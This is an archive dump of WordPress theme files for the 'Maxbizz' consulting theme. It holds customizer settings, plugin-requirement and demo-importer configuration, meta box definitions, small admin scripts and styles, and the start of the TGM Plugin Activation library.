;s:3:"700";s:9:"font-size";s:4:"38px";s:11:"line-height";s:3:"1.2";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:700;s:10:"font-style";s:6:"normal";}s:13:"heading4_typo";a:9:{s:11:"font-family";s:5:"Amiri";s:7:"variant";s:3:"700";s:9:"font-size";s:4:"30px";s:11:"line-height";s:3:"1.2";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:700;s:10:"font-style";s:6:"normal";}s:13:"heading5_typo";a:9:{s:11:"font-family";s:5:"Amiri";s:7:"variant";s:3:"700";s:9:"font-size";s:4:"24px";s:11:"line-height";s:3:"1.2";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:700;s:10:"font-style";s:6:"normal";}s:13:"heading6_typo";a:9:{s:11:"font-family";s:5:"Amiri";s:7:"variant";s:3:"700";s:9:"font-size";s:4:"20px";s:11:"line-height";s:3:"1.2";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:700;s:10:"font-style";s:6:"normal";}s:10:"main_color";s:7:"#4b83fc";s:13:"footer_layout";s:3:"300";s:13:"header_mobile";s:2:"77";s:11:"pheader_img";s:96:"http://wpdemo.archiwp.com/maxbizz-consulting/wp-content/uploads/sites/8/2020/09/pheader-blog.jpg";s:7:"preload";b:1;s:12:"preload_logo";s:92:"http://wpdemo.archiwp.com/maxbizz-consulting/wp-content/uploads/sites/8/2020/07/02_Black.svg";s:8:"page_404";s:3:"597";}s:7:"options";a:2:{s:9:"site_icon";s:4:"1615";s:23:"nav_menus_created_posts";a:0:{}}s:6:"wp_css";s:90:".widget .recent-news h6{
	font-size: 17px;
}
.post-nav .info-post h6{
	font-size: 18px;
}
";}PK�8FZ$�xffinc/backend/plugin-requires.phpnu�[���<?php
/**
 * Register required, recommended plugins for theme
 *
 * @link http://tgmpluginactivation.com/configuration/
 *
 * @package Maxbizz
 */
require_once get_template_directory() . '/inc/libs/class-tgm-plugin-activation.php';
function maxbizz_register_required_plugins() {
	$protocol = is_ssl() ? 'https' : 'http';
	$plugins = array(
		array(
			'name'               => esc_html__( 'Meta Box', 'maxbizz' ),
			'slug'               => 'meta-box',
			'required'           => true,
		),
		array(
			'name'               => esc_html__( 'Kirki', 'maxbizz' ),
			'slug'               => 'kirki',
			'required'           => true,
		),
		array(
			'name'               => esc_html__( 'Elementor Page Builder', 'maxbizz' ),
			'slug'               => 'elementor',
			'required'           => true,
		),
		array(
            'name'               => esc_html__( 'Contact Form 7', 'maxbizz' ),
            'slug'               => 'contact-form-7',
            'required'           => false,
		),
		array(
            'name'               => esc_html__( 'MailChimp for WordPress', 'maxbizz' ),
            'slug'               => 'mailchimp-for-wp',
            'required'           => false,
		),
		array(
            'name'               => esc_html__( 'OT Portfolio', 'maxbizz' ), // The plugin name.
            'slug'               => 'ot_portfolio', // The plugin slug (typically the folder name).
            'source'             => esc_url($protocol.'://oceanthemes.s3.amazonaws.com/plugins/ot_portfolio.zip'), // The plugin source.
            'required'           => false, // If false, the plugin is only 'recommended' instead of required.
        ),
        array(            
            'name'               => esc_html__( 'Revolution Slider', 'maxbizz' ), // The plugin name.
            'slug'               => 'revslider', // The plugin slug (typically the folder name).
            'source'             => esc_url($protocol.'://oceanthemes.s3.amazonaws.com/plugins/revslider.zip'),// The plugin source.
            'required'           => false, // If false, the plugin is only 'recommended' instead of required.
        ),
        array(            
            'name'               => esc_html__( 'OT One Click Demo Content', 'maxbizz' ), // The plugin name.
            'slug'               => 'soo-demo-importer', // The plugin slug (typically the folder name).
            'source'             => esc_url($protocol.'://oceanthemes.s3.amazonaws.com/plugins/soo-demo-importer.zip'), // The plugin source.
            'required'           => false, // If false, the plugin is only 'recommended' instead of required.
        ),
        
	);
	$config  = array(
		'domain'       => 'maxbizz',
		'default_path' => '',
		'menu'         => 'install-required-plugins',
		'has_notices'  => true,
		'is_automatic' => false,
		'message'      => '',
		'strings'      => array(
			'page_title'                      => esc_html__( 'Install Required Plugins', 'maxbizz' ),
			'menu_title'                      => esc_html__( 'Install Plugins', 'maxbizz' ),
			'installing'                      => esc_html__( 'Installing Plugin: %s', 'maxbizz' ),
			'oops'                            => esc_html__( 'Something went wrong with the plugin API.', 'maxbizz' ),
			'notice_can_install_required'     => _n_noop( 'This theme requires the following plugin: %1$s.', 'This theme requires the following plugins: %1$s.', 'maxbizz' ),
			'notice_can_install_recommended'  => _n_noop( 'This theme recommends the following plugin: %1$s.', 'This theme recommends the following plugins: %1$s.', 'maxbizz' ),
			'notice_cannot_install'           => _n_noop( 'Sorry, but you do not have the correct permissions to install the %s plugin. Contact the administrator of this site for help on getting the plugin installed.', 'Sorry, but you do not have the correct permissions to install the %s plugins. Contact the administrator of this site for help on getting the plugins installed.', 'maxbizz' ),
			'notice_can_activate_required'    => _n_noop( 'The following required plugin is currently inactive: %1$s.', 'The following required plugins are currently inactive: %1$s.', 'maxbizz' ),
			'notice_can_activate_recommended' => _n_noop( 'The following recommended plugin is currently inactive: %1$s.', 'The following recommended plugins are currently inactive: %1$s.', 'maxbizz' ),
			'notice_cannot_activate'          => _n_noop( 'Sorry, but you do not have the correct permissions to activate the %s plugin. Contact the administrator of this site for help on getting the plugin activated.', 'Sorry, but you do not have the correct permissions to activate the %s plugins. Contact the administrator of this site for help on getting the plugins activated.', 'maxbizz' ),
			'notice_ask_to_update'            => _n_noop( 'The following plugin needs to be updated to its latest version to ensure maximum compatibility with this theme: %1$s.', 'The following plugins need to be updated to their latest version to ensure maximum compatibility with this theme: %1$s.', 'maxbizz' ),
			'notice_cannot_update'            => _n_noop( 'Sorry, but you do not have the correct permissions to update the %s plugin. Contact the administrator of this site for help on getting the plugin updated.', 'Sorry, but you do not have the correct permissions to update the %s plugins. Contact the administrator of this site for help on getting the plugins updated.', 'maxbizz' ),
			'install_link'                    => _n_noop( 'Begin installing plugin', 'Begin installing plugins', 'maxbizz' ),
			'activate_link'                   => _n_noop( 'Activate installed plugin', 'Activate installed plugins', 'maxbizz' ),
			'return'                          => esc_html__( 'Return to Required Plugins Installer', 'maxbizz' ),
			'plugin_activated'                => esc_html__( 'Plugin activated successfully.', 'maxbizz' ),
			'complete'                        => esc_html__( 'All plugins installed and activated successfully. %s', 'maxbizz' ),
			'nag_type'                        => 'updated',
		),
	);

	tgmpa( $plugins, $config );
}

add_action( 'tgmpa_register', 'maxbizz_register_required_plugins' );
PK�8FZۂ�+__inc/backend/js/admin-script.jsnu�[���(function( $ ) {
    'use strict';
    
    // Show/hide settings for post format when choose post format
    var $format = $('#post-formats-select').find('input.post-format'),
        $formatBox = $('#format_detail');

    $format.on('change', function () {
        var type = $(this).filter(':checked').val();
        postFormatSettings(type);
    });
    $format.filter(':checked').trigger('change');

    $(document.body).on('change', '.editor-post-format .components-select-control__input', function () {
        var type = $(this).val();
        postFormatSettings(type);
    });

    $(window).on('load',function () {
        var $el = $(document.body).find('.editor-post-format .components-select-control__input'),
            type = $el.val();
        postFormatSettings(type);
    });

    function postFormatSettings(type) {
        $formatBox.hide();
        if ($formatBox.find('.rwmb-field').hasClass(type)) {
            $formatBox.show();
        }

        $formatBox.find('.rwmb-field').slideUp();
        $formatBox.find('.' + type).slideDown();
    }

})(jQuery);
PK�8FZ6q�s��%inc/backend/js/upload_media_widget.jsnu�[���(function( $ ) {
    'use strict';

   $(document).on("click", ".upload_image_button", function (e) {
      e.preventDefault();
      var $button = $(this);

      // Create the media frame.
      var file_frame = wp.media.frames.file_frame = wp.media({
         title: 'Select or upload image',
         library: { // remove these to show all
            type: 'image' // specific mime
         },
         button: {
            text: 'Select'
         },
         multiple: false  // Set to true to allow multiple files to be selected
      });

      // When an image is selected, run a callback.
      file_frame.on('select', function () {
         // We set multiple to false so only get one image from the uploader
         var attachment = file_frame.state().get('selection').first().toJSON();
         $button.siblings('input').val(attachment.url);
      });

      // Finally, open the modal
      file_frame.open();
   });
})(jQuery);PK�8FZ��u���inc/backend/importer.phpnu�[���<?php
/**
 * Hooks for importer
 *
 * @package Maxbizz
 */


/**
 * Importer the demo content
 *
 * @since  1.0
 *
 */
function maxbizz_importer() {
	return array(
		array(
			'name'       => 'Home Main',
			'preview'    => get_template_directory_uri().'/inc/backend/data/main/home1.jpg',
			'content'    => get_template_directory_uri().'/inc/backend/data/main/demo-content.xml',
			'customizer' => get_template_directory_uri().'/inc/backend/data/main/customizer.dat',
			'widgets'    => get_template_directory_uri().'/inc/backend/data/main/widgets.wie',
			'sliders'    => get_template_directory_uri().'/inc/backend/data/main/sliders.zip',
			'pages'      => array(
				'front_page' => 'Home',
				'blog'       => 'Blog',
				'shop'       => 'Shop',
				'cart'       => 'Cart',
				'checkout'   => 'Checkout',
				'my_account' => 'My Account',
			),
			'menus'      => array(
				'primary'   => 'main-menu',
			)
		),
		array(
			'name'       => 'Home Consulting',
			'preview'    => get_template_directory_uri().'/inc/backend/data/consulting/home2.jpg',
			'content'    => get_template_directory_uri().'/inc/backend/data/consulting/demo-content.xml',
			'customizer' => get_template_directory_uri().'/inc/backend/data/consulting/customizer.dat',
			'widgets'    => get_template_directory_uri().'/inc/backend/data/consulting/widgets.wie',
			'sliders'    => get_template_directory_uri().'/inc/backend/data/consulting/sliders.zip',
			'pages'      => array(
				'front_page' => 'Home',
				'blog'       => 'Blog',
				'shop'       => 'Shop',
				'cart'       => 'Cart',
				'checkout'   => 'Checkout',
				'my_account' => 'My Account',
			),
			'menus'      => array(
				'primary'   => 'main-menu',
			)
		),
		array(
			'name'       => 'Home Business',
			'preview'    => get_template_directory_uri().'/inc/backend/data/business/home3.jpg',
			'content'    => get_template_directory_uri().'/inc/backend/data/business/demo-content.xml',
			'customizer' => get_template_directory_uri().'/inc/backend/data/business/customizer.dat',
			'widgets'    => get_template_directory_uri().'/inc/backend/data/business/widgets.wie',
			'sliders'    => get_template_directory_uri().'/inc/backend/data/business/sliders.zip',
			'pages'      => array(
				'front_page' => 'Home',
				'blog'       => 'Blog',
				'shop'       => 'Shop',
				'cart'       => 'Cart',
				'checkout'   => 'Checkout',
				'my_account' => 'My Account',
			),
			'menus'      => array(
				'primary'   => 'main-menu',
			)
		),
		array(
			'name'       => 'Home Corporate',
			'preview'    => get_template_directory_uri().'/inc/backend/data/corporate/home4.jpg',
			'content'    => get_template_directory_uri().'/inc/backend/data/corporate/demo-content.xml',
			'customizer' => get_template_directory_uri().'/inc/backend/data/corporate/customizer.dat',
			'widgets'    => get_template_directory_uri().'/inc/backend/data/corporate/widgets.wie',
			'pages'      => array(
				'front_page' => 'Home',
				'blog'       => 'Blog',
				'shop'       => 'Shop',
				'cart'       => 'Cart',
				'checkout'   => 'Checkout',
				'my_account' => 'My Account',
			),
			'menus'      => array(
				'primary'   => 'main-menu',
			)
		),
		array(
			'name'       => 'Home Finance',
			'preview'    => get_template_directory_uri().'/inc/backend/data/finance/home5.jpg',
			'content'    => get_template_directory_uri().'/inc/backend/data/finance/demo-content.xml',
			'customizer' => get_template_directory_uri().'/inc/backend/data/finance/customizer.dat',
			'widgets'    => get_template_directory_uri().'/inc/backend/data/finance/widgets.wie',
			'pages'      => array(
				'front_page' => 'Home',
				'blog'       => 'Blog',
				'shop'       => 'Shop',
				'cart'       => 'Cart',
				'checkout'   => 'Checkout',
				'my_account' => 'My Account',
			),
			'menus'      => array(
				'primary'   => 'main-menu',
			)
		),
	);
}

add_filter( 'soo_demo_packages', 'maxbizz_importer', 30 );PK�8FZ�(Y��"�"inc/backend/meta-boxes.phpnu�[���<?php
/**
 * Registering meta boxes
 *
 * Using Meta Box plugin: http://www.deluxeblogtips.com/meta-box/
 *
 * @see https://docs.metabox.io/
 *
 * @param array $meta_boxes Default meta boxes. By default, there are no meta boxes.
 *
 * @return array All registered meta boxes
 */
function maxbizz_register_meta_boxes( $meta_boxes ) {
	
	// Post format's meta box
	$meta_boxes[] = array(
		'id'       => 'format_detail',
		'title'    => esc_html__( 'Format Details', 'maxbizz' ),
		'pages'    => array( 'post' ),
		'context'  => 'normal',
		'priority' => 'high',
		'autosave' => true,
		'fields'   => array(
			array(
				'name'             => esc_html__( 'Image', 'maxbizz' ),
				'id'               => 'post_image',
				'type'             => 'image_advanced',
				'class'            => 'image',
				'max_file_uploads' => 1,
				// Image size that displays in the edit page. Possible sizes small,medium,large,original
    			'image_size'       => 'thumbnail',
			),
			array(
				'name'  => esc_html__( 'Gallery', 'maxbizz' ),
				'id'    => 'post_gallery',
				'type'  => 'image_advanced',
				'class' => 'gallery',
				// Image size that displays in the edit page. Possible sizes small,medium,large,original
    			'image_size'       => 'thumbnail',
			),			
			array(
				'name'  => esc_html__( 'Audio', 'maxbizz' ),
				'id'    => 'post_audio',
				'type'  => 'textarea',
				'cols'  => 20,
				'rows'  => 2,
				'class' => 'audio',
				'desc'  => 'Example: https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/139083759',
			),
			array(
				'name'  => esc_html__( 'Video', 'maxbizz' ),
				'id'    => 'post_video',
				'type'  => 'textarea',
				'cols'  => 20,
				'rows'  => 2,
				'class' => 'video',
				'desc'  => 'Example: https://vimeo.com/87959439',
			),
			array(
				'name'  => esc_html__( 'Background Video', 'maxbizz' ),
				'id'    => 'bg_video',
				'type'  => 'image_advanced',
				'class' => 'video',
				'max_file_uploads' => 1,
			),
			array(
				'name'  => esc_html__( 'Link', 'maxbizz' ),
				'id'    => 'post_link',
				'type'  => 'textarea',
				'cols'  => 20,
				'rows'  => 2,
				'class' => 'link',
			),
			array(
				'name'  => esc_html__( 'Text Link', 'maxbizz' ),
				'id'    => 'text_link',
				'type'  => 'textarea',
				'cols'  => 20,
				'rows'  => 2,
				'class' => 'link',
			),
			array(
				'name'  => esc_html__( 'Quote', 'maxbizz' ),
				'id'    => 'post_quote',
				'type'  => 'textarea',
				'class' => 'quote',
			),
			array(
				'name'  => esc_html__( 'Quote Name', 'maxbizz' ),
				'id'    => 'quote_name',
				'type'  => 'text',
				'class' => 'quote',
			)		
		),
	);

	// Page Settings
	$meta_boxes[] = array(
		'id'       => 'page-settings',
		'title'    => esc_html__( 'Page Header Settings', 'maxbizz' ),
		'pages'    => array( 'page' ),
		'context'  => 'normal',
		'priority' => 'high',
		'autosave' => true,
		'fields'   => array(
            array(
                'id'        => 'page_layout',
                'name'      => esc_html__( 'Page Layout', 'maxbizz' ),
                'type'      => 'image_select',
                'options'   => array(
                    'full-content'    => get_template_directory_uri() . '/inc/backend/images/full.png',
                    'content-sidebar' => get_template_directory_uri() . '/inc/backend/images/right.png',
                    'sidebar-content' => get_template_directory_uri() . '/inc/backend/images/left.png',
                ),
                'std'       => 'full-content'
            ),
            array(
                'name'             => esc_html__( 'Page Header On/Off', 'maxbizz' ),
                'id'               => 'pheader_switch',
                'type'             => 'switch',
                'style'            => 'rounded',
                'on_label'         => 'On',
                'off_label'        => 'Off',
                'std'              => 'on'
            ),
            array(
                'name'             => esc_html__( 'Background Page Header', 'maxbizz' ),
                'id'               => 'pheader_bg_image',
                'type'             => 'image_advanced',
                'max_file_uploads' => 1,
            )
		),
	);
    
	$meta_boxes[] = array (
      	'id' => 'select-header-footer',
      	'title' => 'Header/Footer Settings',
      	'pages' =>   array ('page'),
      	'context' => 'normal',
      	'priority' => 'high',
      	'autosave' => false,
      	'fields' =>   array (  
        	array(
        		'name' 	=> 'Header Layout',
				'id' 	=> 'select_header',
				'type'  => 'post',
		    	'post_type'   => 'ot_header_builders',
		    	'field_type'  => 'select_advanced',
		    	'placeholder' => 'Select a header',
		    	'query_args'  => array(
		        	'post_status'    => 'publish',
		        	'posts_per_page' => - 1,
		        	'orderby' 		 => 'date',
		        	'order' 		 => 'ASC',
		    	),
			),
			array(
                'name'             => esc_html__( 'Header Transparent?', 'maxbizz' ),
                'id'               => 'is_trans',
				'type'             => 'select',
				'options'   => array(
                    'default'   => 'Default',
                    'yes' 		=> 'Yes',
                    'no' 		=> 'No',
                ),
                'std'       => 'default'
            ),
			array(
        		'name' 	=> 'Header Mobile Layout',
				'id' 	=> 'select_header_mobile',
				'type'  => 'post',
		    	'post_type'   => 'ot_header_builders',
		    	'field_type'  => 'select_advanced',
		    	'placeholder' => 'Select a header mobile',
		    	'query_args'  => array(
		        	'post_status'    => 'publish',
		        	'posts_per_page' => - 1,
		        	'orderby' 		 => 'date',
		        	'order' 		 => 'ASC',
		    	),
			),
			array (
        		'name' 	=> 'Footer Layout',
				'id' 	=> 'select_footer',
				'type'  => 'post',
		    	'post_type'   => 'ot_footer_builders',
		    	'field_type'  => 'select_advanced',
		    	'placeholder' => 'Select a footer',
		    	'query_args'  => array(
		        	'post_status'    => 'publish',
		        	'posts_per_page' => - 1,
		        	'orderby' 		 => 'date',
		        	'order' 		 => 'ASC',
		    	),
        	),
      	),
	);

	$meta_boxes[] = array(
        'id'       => 'ppheader-settings',
        'title'    => esc_html__( 'Page Header Settings', 'maxbizz' ),
        'pages'    => array( 'ot_portfolio' ),
        'context'  => 'normal',
        'priority' => 'high',
        'autosave' => true,
        'fields'   => array(
            array(
                'name'             => esc_html__( 'Page Header On/Off', 'maxbizz' ),
                'id'               => 'pheader_switch',
                'type'             => 'switch',
                'style'            => 'rounded',
                'on_label'         => 'On',
                'off_label'        => 'Off',
                'std'              => 'on'
            ),
            array(
                'name'             => esc_html__( 'Background Page Header', 'maxbizz' ),
                'id'               => 'pheader_bg_image',
                'type'             => 'image_advanced',
                'max_file_uploads' => 1,
			),
        ),
	);
	$meta_boxes[] = array(
        'id'       => 'case-settings',
        'title'    => esc_html__( 'Project Settings', 'maxbizz' ),
        'pages'    => array( 'ot_portfolio' ),
        'context'  => 'normal',
        'priority' => 'high',
        'autosave' => true,
        'fields'   => array(
            array(
                'name'             => esc_html__( 'Carousel Image', 'maxbizz' ),
                'id'               => 'slide_img',
                'type'             => 'image_advanced',
                'max_file_uploads' => 1,
            ),
        ),
    );

    $meta_boxes[] = array(
        'id'       => 'pthumb-settings',
        'title'    => esc_html__( 'Thumbnail Image Settings', 'theratio' ),
        'pages'    => array( 'ot_portfolio' ),
        'context'  => 'normal',
        'priority' => 'high',
        'autosave' => true,
        'fields'   => array(
            array(
                'id'        => 'thumb_size',
                'name'      => esc_html__( 'Select Size', 'theratio' ),
                'type'      => 'select',
                'options'   => array(
                    'normal' 	=> 'Normal Width',
                    'double_w'    => 'Double Width',
                    'double_wh'    => 'Double Width Height',
                ),
                'std'       => 'normal'
            ),
        ),
    );

	return $meta_boxes;
}

add_filter( 'rwmb_meta_boxes', 'maxbizz_register_meta_boxes' );PK�8FZ.r��inc/backend/css/admin-style.cssnu�[���.repeater-field-info_icon textarea{
    height: 30px;
}
#input_blog_layout > label,
#input_single_post_layout > label{
	margin-right: 15px;
	margin-top: 11px;
}
.demos-container .description{
	margin: 30px 0;
	font-size: 16px;
}
form.demo-selector{
    margin: 15px;
}PK�8FZ|K��(inc/libs/class-tgm-plugin-activation.phpnu�[���<?php
/**
 * Plugin installation and activation for WordPress themes.
 *
 * Please note that this is a drop-in library for a theme or plugin.
 * The authors of this library (Thomas, Gary and Juliette) are NOT responsible
 * for the support of your plugin or theme. Please contact the plugin
 * or theme author for support.
 *
 * @package   TGM-Plugin-Activation
 * @version   2.6.1
 * @link      http://tgmpluginactivation.com/
 * @author    Thomas Griffin, Gary Jones, Juliette Reinders Folmer
 * @copyright Copyright (c) 2011, Thomas Griffin
 * @license   GPL-2.0+
 */

/*
	Copyright 2011 Thomas Griffin (thomasgriffinmedia.com)

	This program is free software; you can redistribute it and/or modify
	it under the terms of the GNU General Public License, version 2, as
	published by the Free Software Foundation.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program; if not, write to the Free Software
	Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/

if ( ! class_exists( 'TGM_Plugin_Activation' ) ) {

	/**
	 * Automatic plugin installation and activation library.
	 *
	 * Creates a way to automatically install and activate plugins from within themes.
	 * The plugins can be either bundled, downloaded from the WordPress
	 * Plugin Repository or downloaded from another external source.
	 *
	 * @since 1.0.0
	 *
	 * @package TGM-Plugin-Activation
	 * @author  Thomas Griffin
	 * @author  Gary Jones
	 */
	class TGM_Plugin_Activation {
		/**
		 * TGMPA version number.
		 *
		 * @since 2.5.0
		 *
		 * @const string Version number.
		 */
		const TGMPA_VERSION = '2.6.1';

		/**
		 * Regular expression to test if a URL is a WP plugin repo URL.
		 *
		 * @const string Regex.
		 *
		 * @since 2.5.0
		 */
		const WP_REPO_REGEX = '|^http[s]?://wordpress\.org/(?:extend/)?plugins/|';

		/**
		 * Arbitrary regular expression to test if a string starts with a URL.
		 *
		 * @const string Regex.
		 *
		 * @since 2.5.0
		 */
		const IS_URL_REGEX = '|^http[s]?://|';

		/**
		 * Holds a copy of itself, so it can be referenced by the class name.
		 *
		 * @since 1.0.0
		 *
		 * @var TGM_Plugin_Activation
		 */
		public static $instance;

		/**
		 * Holds arrays of plugin details.
		 *
		 * @since 1.0.0
		 * @since 2.5.0 the array has the plugin slug as an associative key.
		 *
		 * @var array
		 */
		public $plugins = array();

		/**
		 * Holds arrays of plugin names to use to sort the plugins array.
		 *
		 * @since 2.5.0
		 *
		 * @var array
		 */
		protected $sort_order = array();

		/**
		 * Whether any plugins have the 'force_activation' setting set to true.
		 *
		 * @since 2.5.0
		 *
		 * @var bool
		 */
		protected $has_forced_activation = false;

		/**
		 * Whether any plugins have the 'force_deactivation' setting set to true.
		 *
		 * @since 2.5.0
		 *
		 * @var bool
		 */
		protected $has_forced_deactivation = false;

		/**
		 * Name of the unique ID to hash notices.
		 *
		 * @since 2.4.0
		 *
		 * @var string
		 */
		public $id = 'tgmpa';

		/**
		 * Name of the query-string argument for the admin page.
		 *
		 * @since 1.0.0
		 *
		 * @var string
		 */
		protected $menu = 'tgmpa-install-plugins';

		/**
		 * Parent menu file slug.
		 *
		 * @since 2.5.0
		 *
		 * @var string
		 */
		public $parent_slug = 'themes.php';

		/**
		 * Capability needed to view the plugin installation menu item.
		 *
		 * @since 2.5.0
		 *
		 * @var string
		 */
		public $capability = 'edit_theme_options';

		/**
		 * Default absolute path to folder containing bundled plugin zip files.
		 *
		 * @since 2.0.0
		 *
		 * @var string Absolute path prefix to zip file location for bundled plugins. Default is empty string.
		 */
		public $default_path = '';

		/**
		 * Flag to show admin notices or not.
		 *
		 * @since 2.1.0
		 *
		 * @var boolean
		 */
		public $has_notices = true;

		/**
		 * Flag to determine if the user can dismiss the notice nag.
		 *
		 * @since 2.4.0
		 *
		 * @var boolean
		 */
		public $dismissable = true;

		/**
		 * Message to be output above nag notice if dismissable is false.
		 *
		 * @since 2.4.0
		 *
		 * @var string
		 */
		public $dismiss_msg = '';

		/**
		 * Flag to set automatic activation of plugins. Off by default.
		 *
		 * @since 2.2.0
		 *
		 * @var boolean
		 */
		public $is_automatic = false;

		/**
		 * Optional message to display before the plugins table.
		 *
		 * @since 2.2.0
		 *
		 * @var string Message filtered by wp_kses_post(). Default is empty string.
		 */
		public $message = '';

		/**
		 * Holds configurable array of strings.
		 *
		 * Default values are added in the constructor.
		 *
		 * @since 2.0.0
		 *
		 * @var array
		 */
		public $strings = array();

		/**
		 * Holds the version of WordPress.
		 *
		 * @since 2.4.0
		 *
		 * @var int
		 */
		public $wp_version;

		/**
		 * Holds the hook name for the admin page.
		 *
		 * @since 2.5.0
		 *
		 * @var string
		 */
		public $page_hook;

		/**
		 * Adds a reference of this object to $instance, populates default strings,
		 * does the tgmpa_init action hook, and hooks in the interactions to init.
		 *
		 * {@internal This method should be `protected`, but as too many TGMPA implementations
		 * haven't upgraded beyond v2.3.6 yet, this gives backward compatibility issues.
		 * Reverted back to public for the time being.}}
		 *
		 * @since 1.0.0
		 *
		 * @see TGM_Plugin_Activation::init()
		 */
		public function __construct() {
			// Set the current WordPress version.
			$this->wp_version = $GLOBALS['wp_version'];

			// Announce that the class is ready, and pass the object (for advanced use).
			do_action_ref_array( 'tgmpa_init', array( $this ) );

			/*
			 * Load our text domain and allow for overloading the fall-back file.
			 *
			 * {@internal IMPORTANT! If this code changes, review the regex in the custom TGMPA
			 * generator on the website.}}
			 */
			add_action( 'init', array( $this, 'load_textdomain' ), 5 );
			add_filter( 'load_textdomain_mofile', array( $this, 'overload_textdomain_mofile' ), 10, 2 );

			// When the rest of WP has loaded, kick-start the rest of the class.
			add_action( 'init', array( $this, 'init' ) );
		}

		/**
		 * Magic method to (not) set protected properties from outside of this class.
		 *
		 * {@internal hackedihack... There is a serious bug in v2.3.2 - 2.3.6  where the `menu` property
		 * is being assigned rather than tested in a conditional, effectively rendering it useless.
		 * This 'hack' prevents this from happening.}}
		 *
		 * @see https://github.com/TGMPA/TGM-Plugin-Activation/blob/2.3.6/tgm-plugin-activation/class-tgm-plugin-activation.php#L1593
		 *
		 * @since 2.5.2
		 *
		 * @param string $name  Name of an inaccessible property.
		 * @param mixed  $value Value to assign to the property.
		 * @return void  Silently fail to set the property when this is tried from outside of this class context.
		 *               (Inside this class context, the __set() method if not used as there is direct access.)
		 */
		public function __set( $name, $value ) {
			return;
		}

		/**
		 * Magic method to get the value of a protected property outside of this class context.
		 *
		 * @since 2.5.2
		 *
		 * @param string $name Name of an inaccessible property.
		 * @return mixed The property value.
		 */
		public function __get( $name ) {
			return $this->{$name};
		}

		/**
		 * Initialise the interactions between this class and WordPress.
		 *
		 * Hooks in three new methods for the class: admin_menu, notices and styles.
		 *
		 * @since 2.0.0
		 *
		 * @see TGM_Plugin_Activation::admin_menu()
		 * @see TGM_Plugin_Activation::notices()
		 * @see TGM_Plugin_Activation::styles()
		 */
		public function init() {
			/**
			 * By default TGMPA only loads on the WP back-end and not in an Ajax call. Using this filter
			 * you can overrule that behaviour.
			 *
			 * @since 2.5.0
			 *
			 * @param bool $load Whether or not TGMPA should load.
			 *                   Defaults to the return of `is_admin() && ! defined( 'DOING_AJAX' )`.
			 */
			if ( true !== apply_filters( 'tgmpa_load', ( is_admin() && ! defined( 'DOING_AJAX' ) ) ) ) {
				return;
			}

			// Load class strings.
			$this->strings = array(
				'page_title'                      => esc_html__( 'Install Required Plugins', 'maxbizz' ),
				'menu_title'                      => esc_html__( 'Install Plugins', 'maxbizz' ),
				/* translators: %s: plugin name. */
				'installing'                      => esc_html__( 'Installing Plugin: %s', 'maxbizz' ),
				/* translators: %s: plugin name. */
				'updating'                        => esc_html__( 'Updating Plugin: %s', 'maxbizz' ),
				'oops'                            => esc_html__( 'Something went wrong with the plugin API.', 'maxbizz' ),
				'notice_can_install_required'     => _n_noop(
				/* translators: 1: plugin name(s). */
					'This theme requires the following plugin: %1$s.',
					'This theme requires the following plugins: %1$s.',
					'maxbizz'
				),
				'notice_can_install_recommended'  => _n_noop(
				/* translators: 1: plugin name(s). */
					'This theme recommends the following plugin: %1$s.',
					'This theme recommends the following plugins: %1$s.',
					'maxbizz'
				),
				'notice_ask_to_update'            => _n_noop(
				/* translators: 1: plugin name(s). */
					'The following plugin needs to be updated to its latest version to ensure maximum compatibility with this theme: %1$s.',
					'The following plugins need to be updated to their latest version to ensure maximum compatibility with this theme: %1$s.',
					'maxbizz'
				),
				'notice_ask_to_update_maybe'      => _n_noop(
				/* translators: 1: plugin name(s). */
					'There is an update available for: %1$s.',
					'There are updates available for the following plugins: %1$s.',
					'maxbizz'
				),
				'notice_can_activate_required'    => _n_noop(
				/* translators: 1: plugin name(s). */
					'The following required plugin is currently inactive: %1$s.',
					'The following required plugins are currently inactive: %1$s.',
					'maxbizz'
				),
				'notice_can_activate_recommended' => _n_noop(
				/* translators: 1: plugin name(s). */
					'The following recommended plugin is currently inactive: %1$s.',
					'The following recommended plugins are currently inactive: %1$s.',
					'maxbizz'
				),
				'install_link'                    => _n_noop(
					'Begin installing plugin',
					'Begin installing plugins',
					'maxbizz'
				),
				'update_link'                     => _n_noop(
					'Begin updating plugin',
					'Begin updating plugins',
					'maxbizz'
				),
				'activate_link'                   => _n_noop(
					'Begin activating plugin',
					'Begin activating plugins',
					'maxbizz'
				),
				'return'                          =>esc_html__( 'Return to Required Plugins Installer', 'maxbizz' ),
				'dashboard'                       =>esc_html__( 'Return to the Dashboard', 'maxbizz' ),
				'plugin_activated'                =>esc_html__( 'Plugin activated successfully.', 'maxbizz' ),
				'activated_successfully'          =>esc_html__( 'The following plugin was activated successfully:', 'maxbizz' ),
				/* translators: 1: plugin name. */
				'plugin_already_active'           =>esc_html__( 'No action taken. Plugin %1$s was already active.', 'maxbizz' ),
				/* translators: 1: plugin name. */
				'plugin_needs_higher_version'     =>esc_html__( 'Plugin not activated. A higher version of %s is needed for this theme. Please update the plugin.', 'maxbizz' ),
				/* translators: 1: dashboard link. */
				'complete'                        =>esc_html__( 'All plugins installed and activated successfully. %1$s', 'maxbizz' ),
				'dismiss'                         =>esc_html__( 'Dismiss this notice', 'maxbizz' ),
				'notice_cannot_install_activate'  =>esc_html__( 'There are one or more required or recommended plugins to install, update or activate.', 'maxbizz' ),
				'contact_admin'                   =>esc_html__( 'Please contact the administrator of this site for help.', 'maxbizz' ),
			);

			do_action( 'tgmpa_register' );

			/* After this point, the plugins should be registered and the configuration set. */

			// Proceed only if we have plugins to handle.
			if ( empty( $this->plugins ) || ! is_array( $this->plugins ) ) {
				return;
			}

			// Set up the menu and notices if we still have outstanding actions.
			if ( true !== $this->is_tgmpa_complete() ) {
				// Sort the plugins.
